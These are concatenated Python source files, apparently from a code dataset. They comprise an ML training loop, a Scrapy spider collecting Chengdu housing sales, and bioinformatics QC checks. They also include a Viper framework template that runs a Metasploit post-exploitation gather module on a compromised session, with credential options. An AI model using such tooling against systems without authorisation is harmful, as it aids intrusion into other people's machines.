if loss_values[-1] <= loss_mn or acc_values[-1] >= acc_mx:# or epoch < 400:
if loss_values[-1] <= loss_best: #and acc_values[-1] >= acc_best:
loss_best = loss_values[-1]
acc_best = acc_values[-1]
best_epoch = epoch
torch.save(model.state_dict(), dataset +'.pkl')
loss_mn = np.min((loss_values[-1], loss_mn))
acc_mx = np.max((acc_values[-1], acc_mx))
bad_counter = 0
else:
bad_counter += 1
# print(bad_counter, loss_mn, acc_mx, loss_best, acc_best, best_epoch)
if bad_counter == args.patience:
print('Early stop! Min loss: ', loss_mn, ', Max accuracy: ', acc_mx)
print('Early stop model validation loss: ', loss_best, ', accuracy: ', acc_best)
break
print("Optimization Finished!")
print("Total time elapsed: {:.4f}s".format(time.time() - t_total))
# Restore best model
print('Loading {}th epoch'.format(best_epoch))
model.load_state_dict(torch.load(dataset +'.pkl'))
def test():
model.eval()
X = features
X = rand_prop(X, training=False)
output = model(X)
output = torch.log_softmax(output, dim=-1)
loss_test = F.nll_loss(output[idx_test], labels[idx_test])
acc_test = accuracy(output[idx_test], labels[idx_test])
print("Test set results:",
"loss= {:.4f}".format(loss_test.item()),
"accuracy= {:.4f}".format(acc_test.item()))
Train()
test()
| StarcoderdataPython |
3274340 | # -*- coding: utf-8 -*-
import scrapy
import re
import datetime
from ..items import LianjiaChengjiaoItem
class ChengjiaoSpider(scrapy.Spider):
name = 'chengjiao'
allowed_domains = ['cd.lianjia.com']
start_url = "https://cd.lianjia.com/xiaoqu/"
#分小区页面
next_region_url = "https://cd.lianjia.com{}pg{}/"
#已售房源页面
solded_url = "https://cd.lianjia.com/chengjiao/pg{}c{}/"
def start_requests(self):
yield scrapy.Request(self.start_url,callback=self.parse)
#解析获取主地区链接,如锦江区\成华区
def parse(self, response):
regions = response.xpath("//div[@data-role='ershoufang']/div/a/@href").extract()
for region in regions:
region_url = "https://cd.lianjia.com" + region
yield scrapy.Request(region_url, callback=self.parse_region)
#解析获取分地区链接,如川大\红牌楼
def parse_region(self, response):
next_regions = response.xpath("//div[@data-role='ershoufang']/div[2]/a/@href").extract()
for next_region in next_regions:
yield scrapy.Request(self.next_region_url.format(next_region, 1), meta={"page": 1,"next_region":next_region}, callback=self.parse_next_region)
#解析获取分地区下的小区链接,如川大花园小区
def parse_next_region(self, response):
#当前页
page = int(response.meta.get("page"))
next_region = response.meta.get("next_region")
next_region_name = response.meta.get("next_region_name")
items = response.xpath("//ul[@class='listContent']/li")
for item in items:
#获取小区id
village_id = item.xpath("./@data-id").extract_first()
# 获取小区主地区
region = item.xpath(".//a[@class='district']/text()").extract_first().strip()
# 获取小区分地区
next_region_name = item.xpath(".//a[@class='bizcircle']/text()").extract_first().strip()
yield scrapy.Request(self.solded_url.format(1, village_id), callback=self.parse_solded_page,
meta={"village_id": village_id, "region": region, "next_region": next_region,"page": 1, "next_region_name":next_region_name})
# total为小区总数
total = response.xpath("//div[@class='resultDes clear']/h2[@class='total fl']/span/text()").extract_first().strip()
# 平均页数,需转换为整数页
ave_page = int(total)/30
if page < ave_page:
page += 1
yield scrapy.Request(self.next_region_url.format(next_region, page), callback=self.parse_next_region,
meta={"page": page, "next_region": next_region})
#解析小区已售房源信息
def parse_solded_page(self, response):
page = int(response.meta.get("page"))
village_id = response.meta.get("village_id")
region = response.meta.get("region")
next_region_name = response.meta.get("next_region_name")
next_region = response.meta.get("next_region")
total_num = int(response.xpath("//div[@class='total fl']/span/text()").extract_first().strip())
if total_num != 0:
items = response.xpath("//ul[@class='listContent']/li")
for item in items:
i = LianjiaChengjiaoItem()
title = item.xpath(".//div[@class='title']/a/text()").extract_first()
if "车位" not in title:
village_name = title.split(" ")[0]
room_num = title.split(" ")[1]
area = title.split(" ")[2]
price_info = item.xpath(".//div[@class='totalPrice']/span/text()").extract_first()
if "*" in price_info:
total_price = item.xpath(".//span[@class='dealCycleTxt']/span[1]/text()").extract_first().split("牌")[1].split("万")[0]
push_time = str(datetime.date.today())
else:
total_price = price_info.split("万")[0].strip()
push_time =response.xpath(".//div[@class='dealDate']/text()").extract_first().replace(".", "-")
try:
total_time = item.xpath(".//span[@class='dealCycleTxt']/span[2]/text()").extract_first()
i['total_time'] = int(total_time.split("期")[1].split("天")[0])
except:
total_time = item.xpath(".//span[@class='dealCycleTxt']/span/text()").extract_first()
i['total_time'] = int(total_time.split("期")[1].split("天")[0])
house_info = item.xpath(".//div[@class='houseInfo']/text()").extract_first()
i['village_id'] = village_id
i['region'] = region
i['next_region_name'] = next_region_name
i['village_name'] = village_name
i['room_num'] = room_num
i['area'] = float(area.split("平")[0])
i['total_price'] = int(float(total_price)*10000)
i['push_time'] = push_time
i["forward"] = house_info.split("|")[0].strip()
i["elevator"] = house_info.split("|")[-1].strip()
i["url"] = response.url
i["unit_price"] = int((float(total_price)*10000)/(float(area.split("平")[0])))
yield i
ave_page = total_num/30
if page < ave_page:
page += 1
yield scrapy.Request(self.solded_url.format(page, village_id), callback=self.parse_solded_page,
meta={"village_id": village_id, "region": region, "next_region": next_region,"page": page,'next_region_name':next_region_name}) | StarcoderdataPython |
50097 | <reponame>evi1hack/viperpython
# -*- coding: utf-8 -*-
# @File : SimpleRewMsfModule.py
# @Date : 2019/1/11
# @Desc :
#
#
from PostModule.lib.Configs import *
from PostModule.lib.ModuleTemplate import TAG2CH, PostMSFRawModule
from PostModule.lib.OptionAndResult import Option, register_options
# from PostModule.lib.Session import Session
class PostModule(PostMSFRawModule):
NAME = "原始msf模块样例"
DESC = "这是一个原始msf模块的样例,执行的是multi/gather/session_info模块"
REQUIRE_SESSION = True
MODULETYPE = TAG2CH.example
OPTIONS = register_options([
Option(name='StrTest', name_tag="字符串测试", type='str', required=False, desc="测试一个字符串参数", ),
Option(name='BoolTest', name_tag="Bool测试", type='bool', required=False, desc="测试一个Bool参数", default=False),
Option(name='IntgerTest', name_tag="Intger测试", type='integer', required=False, desc="测试一个Intger参数"),
Option(name='EnumTest', name_tag="Enum测试", type='enum', required=False, desc="测试一个enum参数", default='test1',
enum_list=['test1', 'test2', 'test3']),
Option(name=HANDLER_OPTION.get('name'), name_tag=HANDLER_OPTION.get('name_tag'),
type=HANDLER_OPTION.get('type'), required=False,
desc=HANDLER_OPTION.get('desc'),
enum_list=[], option_length=HANDLER_OPTION.get('option_length')),
Option(name=CREDENTIAL_OPTION.get('name'), name_tag=CREDENTIAL_OPTION.get('name_tag'),
type=CREDENTIAL_OPTION.get('type'),
required=False,
desc=CREDENTIAL_OPTION.get('desc'),
enum_list=[],
option_length=CREDENTIAL_OPTION.get('option_length'),
extra_data={'password_type': ['windows', 'browsers']}
),
])
def __init__(self, sessionid, hid, custom_param):
super().__init__(sessionid, hid, custom_param)
self.type = "post"
self.mname = "multi/gather/session_info"
self.runasjob = True
def check(self):
"""执行前的检查函数"""
return True, None
def callback(self, status, message, data):
print(status)
print(message)
print(data)
| StarcoderdataPython |
1749506 | <reponame>J-81/dp_tools
from collections import defaultdict
import copy
import enum
import gzip
import logging
import math
from pathlib import Path
from statistics import mean, median, stdev
import subprocess
from typing import Callable, DefaultDict, Dict, List, Set, Tuple, Union
import pandas as pd
from dp_tools.components.components import GenomeAlignments, RawReadsComponent
from dp_tools.core.entity_model import (
DataDir,
DataFile,
ModuleLevelMQC,
TemplateDataset,
TemplateSample,
)
log = logging.getLogger(__name__)
from dp_tools.core.check_model import Check, Flag, FlagCode
# adapted from reference: https://stackoverflow.com/questions/56048627/round-floats-in-a-nested-dictionary-recursively
# used to round values for easier to read messages
def formatfloat(x):
return "%.3g" % float(x)
def pformat(original_dictionary, function):
dictionary = copy.deepcopy(
original_dictionary
) # we don't want to override original values
if isinstance(dictionary, dict):
new_dict = dict()
for k, v in dictionary.items():
new_dict[k] = function(v) if isinstance(v, float) else pformat(v, function)
return new_dict
return dictionary
class MIDDLE(enum.Enum):
mean: Tuple[Callable] = (mean,)
median: Tuple[Callable] = (median,)
def __call__(self, *args, **kwargs):
return self.value[0](*args, **kwargs)
def identify_outliers(
valueDict: Dict[str, float], standard_deviation_threshold: float, middle: Callable
):
# determine middle value
middle_value: float = middle(valueDict.values())
std_deviation: float = stdev(valueDict.values())
# init tracker
# holds the key name and the standard deviations from the middle
outliers: Dict[str, float] = dict()
# exit early if std_deviation is zero (i.e. no outliers)
if std_deviation == 0:
return outliers
# check if a value is an outlier
for key, value in valueDict.items():
# calculate standard deviations
num_std_deviations_vector = (value - middle_value) / std_deviation
# if an outlier, add it to a dict of outliers (include a +/- standard deviations)
if abs(num_std_deviations_vector) > standard_deviation_threshold:
outliers[key] = num_std_deviations_vector
return outliers
# TODO: typedict for thresholds
def identify_values_past_thresholds(thresholds: dict, value: float) -> List[FlagCode]:
"""Return empty list if no codes are raised"""
VALID_THRESHOLD_TYPES = {"lower", "upper"}
new_codes = list()
for threshold in thresholds:
assert (
threshold.get("type") in VALID_THRESHOLD_TYPES
), f"Invalid threshold type configured: valid options {VALID_THRESHOLD_TYPES} got {threshold.get('type')}"
if threshold.get("type") == "lower":
if value < threshold["value"]:
new_codes.append(threshold["code"])
elif threshold.get("type") == "upper":
if value > threshold["value"]:
new_codes.append(threshold["code"])
return new_codes
def convert_nan_to_zero(input: Dict[str, Union[float, int]]) -> Dict:
"""Convert any Nan into zero"""
output = dict()
for key, value in input.items():
output[key] = value if not math.isnan(value) else 0
return output
## Functions that use the following syntax to merge values from general stats:
# "stat1 + stat2" should search and sum the stats
def stat_string_to_value(stat_string: str, mqcData: ModuleLevelMQC) -> float:
""" "stat1 + stat2" should search and sum the stats"""
sum = float(0)
direct_keys = stat_string.split(" + ")
for direct_key in direct_keys:
print(direct_key)
sum += mqcData["General_Stats"][direct_key]
return sum
## Dataframe and Series specific helper functions
def nonNull(df: pd.DataFrame) -> bool:
# negation since it checks if any are null
return ~df.isnull().any(axis=None)
def nonNegative(df: pd.DataFrame) -> bool:
"""This ignores null values, use nonNull to validate that condition"""
return ((df >= 0) | (df.isnull())).all(axis=None)
def onlyAllowedValues(df: pd.DataFrame, allowed_values: list) -> bool:
"""This ignores null values, use nonNull to validate that condition"""
return ((df.isin(allowed_values)) | (df.isnull())).all(axis=None)
class SAMPLE_RAWREADS_0001(Check):
description = (
"Check that appropriate raw reads components exist. Also check that "
"All datafiles associated with the components are present. "
"For paired end studies, this means both rawForwardReads and rawReverseReads "
"Are attached components. For single end studies, "
"this means the rawReads component is attached. "
"For paired end studies, confirms that forward and reverse read counts match."
)
flag_desc = {
FlagCode.GREEN: "All expected raw read files present",
FlagCode.HALT1: "Missing expected components: {missing_components}",
FlagCode.HALT2: "Forward and reverse reads counts differ. Forward: ({forward_read_count}) Reverse: ({reverse_read_count})",
FlagCode.DEV_HANDLED: "Searched for component, but component was not expected by entity model: {unexpected_components}",
}
def validate_func(self, sample: TemplateSample) -> Flag:
# assume passing unless a flag condition arises
code = FlagCode.GREEN
# set branching informative parameters based on layout
if sample.dataset.metadata.paired_end:
expected_components = ["rawForwardReads", "rawReverseReads"]
check_read_parity = True
else:
expected_components = ["rawReads"]
check_read_parity = False
missing_components = list()
unexpected_components = list()
for expected_component in expected_components:
component = getattr(sample, expected_component, None)
if component == None:
unexpected_components.append(expected_component)
if not isinstance(component, RawReadsComponent):
missing_components.append(expected_component)
if unexpected_components:
code = FlagCode.DEV_HANDLED
if missing_components:
code = FlagCode.HALT1
# check parity
if all([check_read_parity, code == FlagCode.GREEN]):
if (
not sample.rawForwardReads.mqcData["FastQC"]["General_Stats"][
"total_sequences"
]
== sample.rawReverseReads.mqcData["FastQC"]["General_Stats"][
"total_sequences"
]
):
code = FlagCode.HALT2
return Flag(
check=self,
codes=code,
message_args={
"missing_components": missing_components,
"forward_read_count": sample.rawForwardReads.mqcData["FastQC"][
"General_Stats"
]["total_sequences"]
if code == FlagCode.HALT2
else None,
"reverse_read_count": sample.rawReverseReads.mqcData["FastQC"][
"General_Stats"
]["total_sequences"]
if code == FlagCode.HALT2
else None,
},
)
class SAMPLE_TRIMREADS_0001(SAMPLE_RAWREADS_0001):
...
class COMPONENT_RAWREADS_0001(Check):
config = {
"lines_to_check": 200_000_000,
# attributes names
"expected_data_files": [
"fastqGZ",
"fastQCmultiQCDirZIP",
"fastqcReportHTML",
"fastqcReportZIP",
],
}
description = (
"Confirms that all read components (e.g. rawForwardReads, trimmedReads) should include the following: "
"Datafiles of the format: {expected_data_files} related to the reads component. "
"Additionally, the following checks are performed for each file type: "
"\tfastq.gz: First {lines_to_check} lines are checked for correct format. "
)
flag_desc = {
FlagCode.GREEN: "Component passes all validation requirements.",
FlagCode.HALT1: "Missing expected files: {missing_files}",
FlagCode.HALT2: "Fastq.gz file has issues on lines: {lines_with_issues}",
FlagCode.HALT3: "Corrupted Fastq.gz file suspected, last line number encountered: {last_line_checked}",
}
def validate_func(self: Check, component) -> Flag:
"""Checks fastq lines for expected header content
Note: Example of header from GLDS-194
| ``@J00113:376:HMJMYBBXX:3:1101:26666:1244 1:N:0:NCGCTCGA\n``
This also assumes the fastq file does NOT split sequence or quality lines
for any read
:param component: A ReadsComponent
"""
# assume passing first
# overwrite if flag conditions met
code = FlagCode.GREEN
# Subcheck: 1 ( can trigger HALT1 )
# check if expected files exist first
missing_files: List[Path] = list()
lines_with_issues: List[int] = list()
i = 0
for expected_file in self.config["expected_data_files"]:
try:
# check the attribute is exists and is of the proper type
assert any(
[
isinstance(getattr(component, expected_file), DataFile),
isinstance(getattr(component, expected_file), DataDir),
]
)
# check the path exists
assert getattr(component, expected_file).path.exists()
except AssertionError:
code = FlagCode.HALT1
missing_files.append(expected_file)
# check if exiting makes sense before next checks
if code != FlagCode.GREEN:
return Flag(
check=self,
codes=code,
message_args={
"lines_with_issues": lines_with_issues,
"last_line_checked": i,
"missing_files": missing_files,
},
)
# subcheck: 2 ( can trigger HALT2,HALT3 )
# check fastq.gz file looks correct
file = component.fastqGZ.path
count_lines_to_check = self.config["lines_to_check"]
if count_lines_to_check == -1:
count_lines_to_check = float("inf")
# truncated files raise EOFError
# catch this as HALT3
try:
with gzip.open(file, "rb") as f:
for i, line in enumerate(f):
# checks if lines counted equals the limit input
if i + 1 == count_lines_to_check:
log.debug(
f"Reached {count_lines_to_check} lines, ending line check"
)
break
line = line.decode()
# every fourth line should be an identifier
expected_identifier_line = i % 4 == 0
# check if line is actually an identifier line
if expected_identifier_line and line[0] != "@":
lines_with_issues.append(i + 1)
# update every 20,000,000 reads
if i % 20_000_000 == 0:
log.debug(f"Checked {i} lines for {file}")
pass
if not len(lines_with_issues) == 0:
code = FlagCode.HALT2
except (EOFError, gzip.BadGzipFile):
code = FlagCode.HALT3
# return flag
return Flag(
check=self,
codes=code,
message_args={
"lines_with_issues": lines_with_issues,
"last_line_checked": i,
"missing_files": missing_files,
},
)
class COMPONENT_TRIMREADS_0001(COMPONENT_RAWREADS_0001):
config = {
"lines_to_check": 200_000_000,
"expected_data_files": [
"fastqGZ",
"fastQCmultiQCDirZIP",
"fastqcReportHTML",
"fastqcReportZIP",
"trimmingReportTXT",
],
}
class COMPONENT_GENOMEALIGNMENTS_0001(Check):
config = {
"expected_files": {
"alignedToTranscriptomeBam": {"samtoolsQuickCheck": True},
"alignedSortedByCoordBam": {"samtoolsQuickCheck": True},
"alignedSortedByCoordResortedBam": {"samtoolsQuickCheck": True},
"alignedSortedByCoordResortedBamIndex": {},
"logFinal": {},
"logProgress": {},
"logFull": {},
"sjTab": {},
},
# Will use the following syntax for combined metrics
# 'metric1' + 'metric2' + 'metric3'
# valid types: 'upper', 'lower'
"general_stats_metrics": {
"uniquely_mapped_percent + multimapped_percent": [
{"code": FlagCode.YELLOW1, "type": "lower", "value": 70},
{"code": FlagCode.RED1, "type": "lower", "value": 50},
],
# DISCUSS: this seems an odd check. Recommending modification
# Maybe combine with other metrics for more meaningful assessment
# Ref: https://github.com/J-81/JDO_V-V/blob/b3e0f4734eedabaa7ec99119073cf4e263f0963d/CHECKS.md?plain=1#L192
"multimapped_toomany_percent + multimapped_percent": [
{"code": FlagCode.YELLOW1, "type": "lower", "value": 30},
{"code": FlagCode.RED1, "type": "lower", "value": 15},
],
},
}
description = (
"Check that the following files exists: {expected_files} "
"Beyond existence, validating the files are not corrupt needs to be performed external to this automated V&V program "
"Specifically, bam files can be validated using samtools quickcheck (see: http://www.htslib.org/doc/samtools-quickcheck.html) "
""
)
flag_desc = {
FlagCode.GREEN: "Component passes all validation requirements.",
FlagCode.YELLOW1: "Found values beyond defined yellow thresholds: {flagged_values} -> {threshold_config}",
FlagCode.RED1: "Found values beyond defined red thresholds: {flagged_values} -> {threshold_config}",
FlagCode.HALT1: "Missing expected files: {missing_files}",
}
def UNIMPLEMENTED_samtoolsQuickCheck(self, bamFile: Path) -> str:
"""
This function is deprecated until getting subprocesses to use conda envs is properly implemented
Returns error message if an issue is found, empty string otherwise
"""
# check with coord file with samtools
process = subprocess.Popen(
["samtools", "quickcheck", bamFile],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
stdout, stderr = process.communicate()
return stderr.decode()
def validate_func(
self: Check, component: GenomeAlignments, mqc_name: str = "STAR"
) -> Flag:
codes = {FlagCode.GREEN}
missing_files = list()
flagged_values = dict()
for expected_file, constraints in self.config["expected_files"].items(): # type: ignore
# check exists
if not getattr(component, expected_file).path.is_file():
codes.add(FlagCode.HALT1)
missing_files.append(expected_file)
# check with samtools (as per "samtoolsQuickCheck")
# if constraints.get("samtoolsQuickCheck"):
# self._samtoolsQuickCheck(getattr(component, expected_file).path)
for key, thresholds in self.config["general_stats_metrics"].items(): # type: ignore
# key may be a direct general stats key or a stat_string
# check if direct key
value = component.mqcData[mqc_name].get(key, None)
if not value:
# check if valid stat_string
value = stat_string_to_value(key, component.mqcData[mqc_name])
# check against thresholds
# yellow level outliers
if new_codes := identify_values_past_thresholds(thresholds, value):
# add highest severity new code
codes.add(max(new_codes))
flagged_values[key] = value
return Flag(
check=self,
codes=codes,
message_args={
"missing_files": missing_files,
"threshold_config": self.config["general_stats_metrics"],
"flagged_values": flagged_values,
},
)
class DATASET_METADATA_0001(Check):
config = {"expected_metadata_attrs": ["paired_end", "has_ercc"]}
description = "Checks and reports expected metdata required for processing"
flag_desc = {
FlagCode.GREEN: "All expected metadata is accessible and populated. {actual_metadata_fields}",
FlagCode.HALT1: "Missing expected metadata fields: {missing_metadata_fields}",
}
def validate_func(self, dataset: TemplateDataset) -> Flag:
# assume green unless flag condition met
code = FlagCode.GREEN
# set up tracker for expected attributes values
tracked_metadata = dict()
# and a tracker for missing attributes
missing_metadata_fields = list()
for attr in self.config["expected_metadata_attrs"]:
attr_value = getattr(dataset.metadata, attr, None)
if attr_value != None:
tracked_metadata[attr] = attr_value
else:
missing_metadata_fields.append(attr)
# check if any missing_metadata_fields are present
if missing_metadata_fields:
code = FlagCode.HALT1
return Flag(
check=self,
codes=code,
message_args={
"actual_metadata_fields": tracked_metadata,
"missing_metadata_fields": missing_metadata_fields,
},
)
class DATASET_RAWREADS_0001(Check):
config = {
"metrics": [
"percent_gc",
"avg_sequence_length",
"total_sequences",
"percent_duplicates",
# "percent_fails", number of failed FastQC submodules, not a very useful metric for BulkRNASeq
],
"middle": MIDDLE.median,
"yellow_standard_deviation_threshold": 2,
"red_standard_deviation_threshold": 4,
"target_components_by_paired_end": {
True: ["rawForwardReads", "rawReverseReads"],
False: ["rawReads"],
},
}
description = (
"Check that the reads stats (source from FastQC) have no outliers among samples "
"for the following metrics: {metrics}. "
"Yellow Flagged Outliers are defined as a being {yellow_standard_deviation_threshold} - {red_standard_deviation_threshold} standard "
"deviations away from the {middle.name}. "
"Red Flagged Outliers are defined as a being {red_standard_deviation_threshold}+ standard "
"deviations away from the {middle.name}. "
)
flag_desc = {
FlagCode.GREEN: "No reads metric outliers detected for {metrics}",
FlagCode.YELLOW1: "Outliers detected as follows (values are rounded number of standard deviations from middle): {formatted_outliers}",
FlagCode.RED1: "Outliers detected as follows (values are rounded number of standard deviations from middle): {formatted_outliers}",
}
def validate_func(self: Check, dataset: TemplateDataset) -> Flag:
code = FlagCode.GREEN
# pull variables from config
metrics = self.config["metrics"]
middle = self.config["middle"]
yellow_threshold = self.config["yellow_standard_deviation_threshold"]
red_threshold = self.config["red_standard_deviation_threshold"]
# init trackers for issues
outliers: DefaultDict[str, Dict[str, float]] = defaultdict(dict)
# determine reads components in samples
readsComponents = self.config["target_components_by_paired_end"][
dataset.metadata.paired_end
]
def format_identifier(sample_name: str, component_str: str) -> str:
"""Add forward and reverse suffix if paired end, add nothing otherwise"""
return (
f"{sample_name}:{component_str}"
if dataset.metadata.paired_end
else sample_name
)
# iterate through metrics (here all pulled from FastQC general stats)
for readComponent in readsComponents:
for metric in metrics:
sampleToMetric: Dict[str, float] = {
format_identifier(s.name, readComponent): getattr(
s, readComponent
).mqcData["FastQC"]["General_Stats"][metric]
for s in dataset.samples.values()
}
# ensure any NaN convert to zero as implied by MultiQC
sampleToMetric = convert_nan_to_zero(sampleToMetric)
# yellow level outliers
if outliersForThisMetric := identify_outliers(
sampleToMetric,
standard_deviation_threshold=yellow_threshold,
middle=middle,
):
if code < FlagCode.YELLOW1:
code = FlagCode.YELLOW1
outliers[metric] = outliers[metric] | outliersForThisMetric
# red level outliers
if outliersForThisMetric := identify_outliers(
sampleToMetric,
standard_deviation_threshold=red_threshold,
middle=middle,
):
if code < FlagCode.RED1:
code = FlagCode.RED1
outliers[metric] = outliers[metric] | outliersForThisMetric
return Flag(
codes=code,
check=self,
message_args={
"outliers": outliers,
"metrics": metrics,
"formatted_outliers": pformat(outliers, formatfloat),
},
)
class DATASET_TRIMREADS_0001(DATASET_RAWREADS_0001):
# overwrite specific config only
config = DATASET_RAWREADS_0001.config | {
"target_components_by_paired_end": {
True: ["trimForwardReads", "trimReverseReads"],
False: ["trimReads"],
}
}
class DATASET_GENOMEALIGNMENTS_0001(Check):
config = {
"metrics": [
# "total_reads", # check in FastQC, but is used to normalize
# "avg_input_read_length",
# "uniquely_mapped", # redundant with better metric of percent
"uniquely_mapped_percent",
"avg_mapped_read_length",
# "num_splices",
# "num_annotated_splices",
# "num_GTAG_splices",
# "num_GCAG_splices",
# "num_ATAC_splices",
# "num_noncanonical_splices",
"mismatch_rate",
"deletion_rate",
"deletion_length",
"insertion_rate",
"insertion_length",
# "multimapped", # redundant with better metric of percent
"multimapped_percent",
# "multimapped_toomany", # redundant with better metric of percent
"multimapped_toomany_percent",
"unmapped_mismatches_percent",
"unmapped_tooshort_percent",
"unmapped_other_percent",
# "unmapped_mismatches", # redundant with better metric of percent
# "unmapped_tooshort", # redundant with better metric of percent
# "unmapped_other", # redundant with better metric of percent
],
"middle": MIDDLE.median,
"yellow_standard_deviation_threshold": 2,
"red_standard_deviation_threshold": 4,
}
description = (
"Check that the genome alignment stats (source from STAR logs) have no outliers among samples "
"for the following metrics: {metrics}. "
"Yellow Flagged Outliers are defined as a being {yellow_standard_deviation_threshold} - {red_standard_deviation_threshold} standard "
"deviations away from the {middle.name}. "
"Red Flagged Outliers are defined as a being {red_standard_deviation_threshold}+ standard "
"deviations away from the {middle.name}. "
)
flag_desc = {
FlagCode.GREEN: "No genome alignment metric outliers detected for {metrics}",
FlagCode.YELLOW1: "Outliers detected as follows (values are rounded number of standard deviations from middle): {formatted_outliers}",
FlagCode.RED1: "Outliers detected as follows (values are rounded number of standard deviations from middle): {formatted_outliers}",
}
def validate_func(self: Check, dataset: TemplateDataset) -> Flag:
code = FlagCode.GREEN
# pull variables from config
metrics = self.config["metrics"]
middle = self.config["middle"]
yellow_threshold = self.config["yellow_standard_deviation_threshold"]
red_threshold = self.config["red_standard_deviation_threshold"]
# init trackers for issues
outliers: DefaultDict[str, Dict[str, float]] = defaultdict(dict)
# determine reads components in samples
targetComponents = ["genomeAlignments"]
# iterate through metrics (here all pulled from FastQC general stats)
for targetComponent in targetComponents:
for metric in metrics:
sampleToMetric: Dict[str, float] = {
s.name: getattr(s, targetComponent).mqcData["STAR"][
"General_Stats"
][metric]
for s in dataset.samples.values()
}
# ensure any NaN convert to zero as implied by MultiQC
sampleToMetric = convert_nan_to_zero(sampleToMetric)
# yellow level outliers
if outliersForThisMetric := identify_outliers(
sampleToMetric,
standard_deviation_threshold=yellow_threshold,
middle=middle,
):
if code < FlagCode.YELLOW1:
code = FlagCode.YELLOW1
outliers[metric] = outliers[metric] | outliersForThisMetric
# red level outliers
if outliersForThisMetric := identify_outliers(
sampleToMetric,
standard_deviation_threshold=red_threshold,
middle=middle,
):
if code < FlagCode.RED1:
code = FlagCode.RED1
outliers[metric] = outliers[metric] | outliersForThisMetric
return Flag(
codes=code,
check=self,
message_args={
"outliers": outliers,
"metrics": metrics,
"formatted_outliers": pformat(outliers, formatfloat),
},
)
class DATASET_RSEQCANALYSIS_0001(Check):
config = {
"plots_all": ["Read Distribution", "Infer experiment", "Gene Body Coverage"],
"plot_paired_end": ["Inner Distance"],
"middle": MIDDLE.median,
"yellow_standard_deviation_threshold": 2,
"red_standard_deviation_threshold": 4,
"stranded_assessment_range": {"min": 75, "max": 100}, # percents
"halt_ambiguous_dominant_strandedness_range": {
"min": 60,
"max": 75,
}, # percents
"unstranded_assessment_range": {"min": 40, "max": 60}, # percents
"valid_dominant_strandedness_assessments": [
"Sense (% Tags)",
"Antisense (% Tags)",
], # this leaves out undetermined, which should raise alarms if it is the dominant assessment
}
description = (
"Check that the rseqc analysis stats (sourced from the rseqc logs) have no outlier values among samples "
"for the following plots: {plots_all} (Paired end only: {plot_paired_end}). "
"Yellow Flagged Outliers are defined as a being {yellow_standard_deviation_threshold} - {red_standard_deviation_threshold} standard "
"deviations away from the {middle.name}. "
"Red Flagged Outliers are defined as a being {red_standard_deviation_threshold}+ standard "
"deviations away from the {middle.name}. "
"Additionally the following is assessed for infer experiment strandedess metrics: "
"A Halt Flag is raised in the case that the dominant strandessness is between "
"{halt_ambiguous_dominant_strandedness_range} "
"Note: the 'dominant strandedness' is the max(datasetwide_median(antisense), datasetwide_median(sense)) "
"Valid assessments include {valid_dominant_strandedness_assessments}, other assessments (e.g. 'undetermined') will raise a Halting flag "
)
flag_desc = {
FlagCode.GREEN: "No rseqc analysis metric outliers detected for {metrics}",
FlagCode.YELLOW1: "Outliers detected as follows (values are rounded number of standard deviations from middle): {formatted_outliers}",
FlagCode.RED1: "Outliers detected as follows (values are rounded number of standard deviations from middle): {formatted_outliers}",
FlagCode.RED2: "At least one sample is outside the dominant strandedness assignment range: {samples_outside_range}",
FlagCode.HALT1: "The dominant strandedness is {dominant_strandedness}, this is lower than the halting flag threshold.",
FlagCode.HALT2: "The dominant strandedness is {dominant_strandedness} which is not a invalid assessment.",
}
def validate_func(self: Check, dataset: TemplateDataset) -> Flag:
codes = {FlagCode.GREEN}
# pull variables from config
targetPlotsAll = self.config["plots_all"]
targetPlotsPairedEnd = self.config["plot_paired_end"]
middle = self.config["middle"]
yellow_threshold = self.config["yellow_standard_deviation_threshold"]
red_threshold = self.config["red_standard_deviation_threshold"]
# init trackers for issues
outliers: DefaultDict[str, Dict[str, float]] = defaultdict(dict)
# extend with paired end specific plot if appropriate
targetPlots = targetPlotsAll
if dataset.metadata.paired_end:
targetPlots.extend(targetPlotsPairedEnd)
# iterate through metrics (here all pulled from FastQC general stats)
for plot_name in targetPlots:
# extract dataframe of all samples
df = dataset.getMQCDataFrame(
sample_component="rSeQCAnalysis", mqc_module="RSeQC", mqc_plot=plot_name
)
# convert to samplewise dicts
metricToSampleToMetricValue: Dict[str, Dict[str, float]] = df.to_dict()
for metricName, sampleToMetricValue in metricToSampleToMetricValue.items():
# ensure any NaN convert to zero as implied by MultiQC
sampleToMetricValue = convert_nan_to_zero(sampleToMetricValue)
# yellow level outliers
if outliersForThisMetric := identify_outliers(
sampleToMetricValue,
standard_deviation_threshold=yellow_threshold,
middle=middle,
):
if max(codes) < FlagCode.YELLOW1:
codes.add(FlagCode.YELLOW1)
outliers[metricName] = outliers[metricName] | outliersForThisMetric
# red level outliers
if outliersForThisMetric := identify_outliers(
sampleToMetricValue,
standard_deviation_threshold=red_threshold,
middle=middle,
):
if max(codes) < FlagCode.RED1:
codes.add(FlagCode.RED1)
# remove lower FlagCode YELLOW1
codes.remove(FlagCode.YELLOW1)
outliers[metricName] = outliers[metricName] | outliersForThisMetric
def get_median_strandedness(dataset: TemplateDataset) -> tuple[str, float]:
df = dataset.getMQCDataFrame(
sample_component="rSeQCAnalysis",
mqc_module="RSeQC",
mqc_plot="Infer experiment",
).fillna(
0
) # Nan is a zero for this MultiQC table
median_strandedness = df.median().to_dict()
return median_strandedness
median_strandedness = get_median_strandedness(dataset)
# check if dominant assessment is valid
strand_assessment: str = max(
median_strandedness, key=lambda k: median_strandedness[k]
)
if (
strand_assessment
not in self.config["valid_dominant_strandedness_assessments"]
):
codes.add(FlagCode.HALT2)
# flag based on thresholds
assessment_value: float = median_strandedness[strand_assessment]
is_stranded: bool = (
self.config["stranded_assessment_range"]["max"]
> assessment_value
> self.config["stranded_assessment_range"]["min"]
)
is_unstranded: bool = (
self.config["unstranded_assessment_range"]["max"]
> assessment_value
> self.config["unstranded_assessment_range"]["min"]
)
def determine_samples_outside_range(
dataset: TemplateDataset, min: float, max: float
) -> list[str]:
df = dataset.getMQCDataFrame(
sample_component="rSeQCAnalysis",
mqc_module="RSeQC",
mqc_plot="Infer experiment",
).fillna(
0
) # Nan is a zero for this MultiQC table
return df.index[df[strand_assessment].between(min, max) == False].to_list()
# Catalog and flag any samples outside of range
# flags based on samples that are out of the assessment range
samples_outside_range: list[str]
if is_stranded:
samples_outside_range = determine_samples_outside_range(
dataset,
self.config["stranded_assessment_range"]["min"],
self.config["stranded_assessment_range"]["max"],
)
elif is_unstranded:
samples_outside_range = determine_samples_outside_range(
dataset,
